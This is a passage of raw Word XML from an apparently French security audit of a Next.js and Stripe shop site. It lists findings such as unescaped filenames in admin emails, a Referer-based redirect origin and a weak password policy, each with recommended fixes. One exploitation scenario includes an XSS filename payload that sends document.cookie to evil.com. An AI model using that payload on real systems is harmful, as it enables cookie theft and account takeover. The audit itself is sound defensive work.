          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Le nom du fichier uploadé (file.name) est inséré directement dans le corps HTML de l'email envoyé à l'administrateur, sans echappement. Contrairement aux routes admin/orders/[id] qui définissent et utilisent une fonction esc(), cette route l'omet. Un attaquant peut soumettre un fichier dont le nom contient des balises HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Un client nomme son fichier : &lt;img src=x onerror='fetch("https://evil.com/?"+document.cookie)'&gt;.svg. Selon le client email de l'administrateur et sa configuration de rendu HTML, cette injection peut exécuter du JavaScript dans le contexte de l'interface email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Échapper file.name avant insertion dans le template HTML :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>function esc(s: string | undefined): string {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return (s ?? '')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .replace(/&amp;/g, '&amp;amp;').replace(/&lt;/g, '&amp;lt;')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .replace(/&gt;/g, '&amp;gt;').replace(/"/g, '&amp;quot;');</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Dans le template email :</w:t>
        <w:br/>
        <w:t>html: `... Fichier : &lt;strong&gt;${esc(file.name)}&lt;/strong&gt; ...`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1D5FA8"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>F-04 — Origine dynamique basée sur le Referer dans les URLs Stripe</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>src/lib/siteUrl.ts (lignes 28–34)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-601 — URL Redirection to Untrusted Site</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>La fonction getPublicSiteOrigin() utilise l'en-tête Referer comme source de l'origine si les variables d'environnement NEXT_PUBLIC_SITE_URL et CF_PAGES_URL ne sont pas définies. Cette origine est ensuite utilisée pour construire les URLs success_url et cancel_url transmises à Stripe lors de la création d'une session de paiement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Si les variables d'env ne sont pas configurées en production, un attaquant envoie une requête POST /api/checkout avec l'en-tête Referer: https://evil-phishing.com/. La success_url Stripe devient https://evil-phishing.com/success?session_id=... L'utilisateur est redirigé vers un site de phishing après le paiement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Définir impérativement NEXT_PUBLIC_SITE_URL en production. En défense-en-profondeur, ajouter un fallback dur et rejeter la requête si l'origine ne peut être déterminée :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>export function getPublicSiteOrigin(request: Request): string {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const fromEnv = process.env.NEXT_PUBLIC_SITE_URL?.trim();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (fromEnv) return new URL(fromEnv).origin;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const cf = process.env.CF_PAGES_URL?.trim();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (cf) return new URL(cf).origin;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  // Ne jamais accepter le Referer comme source d'autorité</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return 'https://www.axionpad.fr'; // fallback dur</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>I-01 — Politique de mot de passe insuffisante (longueur seule)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Informationnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>src/app/api/auth/register/route.ts (lignes 32–34)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-521 — Weak Password Requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Seule une longueur minimale de 8 caractères est imposée. Aucune complexité n'est requise (majuscule, chiffre, symbole) et les mots de passe les plus courants (ex. 'password', '12345678') sont acceptés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Credential stuffing facilité si des utilisateurs choisissent des mots de passe triviaux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Rejeter les mots de passe figurant dans une liste de mots de passe courants (NIST SP 800-63B).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>const COMMON_PASSWORDS = new Set(['password', '12345678', 'qwerty123' /* ... */]);</w:t>
        <w:br/>
        <w:t>if (COMMON_PASSWORDS.has(password.toLowerCase())) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return NextResponse.json({ error: 'Mot de passe trop commun' }, { status: 400 });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>I-02 — Double instanciation du client Stripe dans le webhook</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Informationnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>src/app/api/webhook/route.ts (lignes 65)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-400 — Uncontrolled Resource Consumption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Un second client Stripe (`stripe2`) est instancié à l'intérieur d'un bloc conditionnel alors qu'un client `stripe` est déjà disponible dans le scope parent. Redondance de code sans impact sécuritaire direct, mais représente un léger surcoût CPU/mémoire sur Cloudflare Edge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Non exploitable directement. Impact limité aux performances.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Réutiliser l'instance stripe existante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// Remplacer :</w:t>
        <w:br/>
        <w:t>const stripe2 = new Stripe(process.env.STRIPE_SECRET_KEY!);</w:t>
        <w:br/>
        <w:t>const rate = await stripe2.shippingRates.retrieve(rateRef);</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Par :</w:t>
        <w:br/>
        <w:t>const rate = await stripe.shippingRates.retrieve(rateRef);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>I-03 — Proxy API sans restriction d'origine dans next.config.ts</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Informationnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>next.config.ts (lignes 11–17)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-441 — Unintended Proxy / Intermediary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Le rewrite fallback proxifie tous les chemins /api/* non matchés vers NEXT_PUBLIC_API_URL. Si NEXT_PUBLIC_API_URL était modifiée (ex. compromission de l'environnement de build), le proxy deviendrait un vecteur SSRF ou de redirection de trafic vers un serveur malveillant. En production Cloudflare Pages, ce rewrite n'est pas actif (pas d'API externe), le risque est donc résiduel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Potentiellement exploitable uniquement en cas de compromission de l'environnement CI/CD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Supprimer le rewrite si l'API externe n'est plus utilisée en production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// Retirer le bloc rewrites() dans next.config.ts si non utilisé en production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1614"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>5. Recommandations générales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate Limiting Cloudflare : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Activer les règles WAF Rate Limiting sur tous les endpoints d'authentification (/api/admin/login, /api/auth/login, /api/auth/register) et sur /api/reviews. Cloudflare propose cette fonctionnalité nativement sans modification de code.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">En-têtes de sécurité HTTP : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Configurer les headers dans next.config.ts (X-Frame-Options, CSP, HSTS, X-Content-Type-Options). Valider avec securityheaders.com après déploiement.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Gestion des secrets : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Migrer tous les secrets (ADMIN_PASSWORD, STRIPE_SECRET_KEY, JWT_SECRET, AUTH_SECRET, RESEND_API_KEY) vers les variables d'environnement chiffrées Cloudflare Workers (Workers Secrets, pas les variables d'env classiques). Ne jamais stocker de secret en plaintext — les hacher avant stockage (admin password).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Dépendances : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Aucune dépendance vulnérabilité critique n'a été identifiée dans package.json au moment de l'audit (Next.js 15.5.2, Stripe 17, Three.js 0.184.0). Exécuter npm audit régulièrement et activer Dependabot sur GitHub pour les mises à jour automatiques.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Pipeline CI/CD : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Ajouter une étape npm audit --audit-level=high dans le workflow GitHub Actions existant. Envisager l'ajout d'un scanner SAST (ex. CodeQL, Semgrep) sur chaque Pull Request.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Journalisation et alertes : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
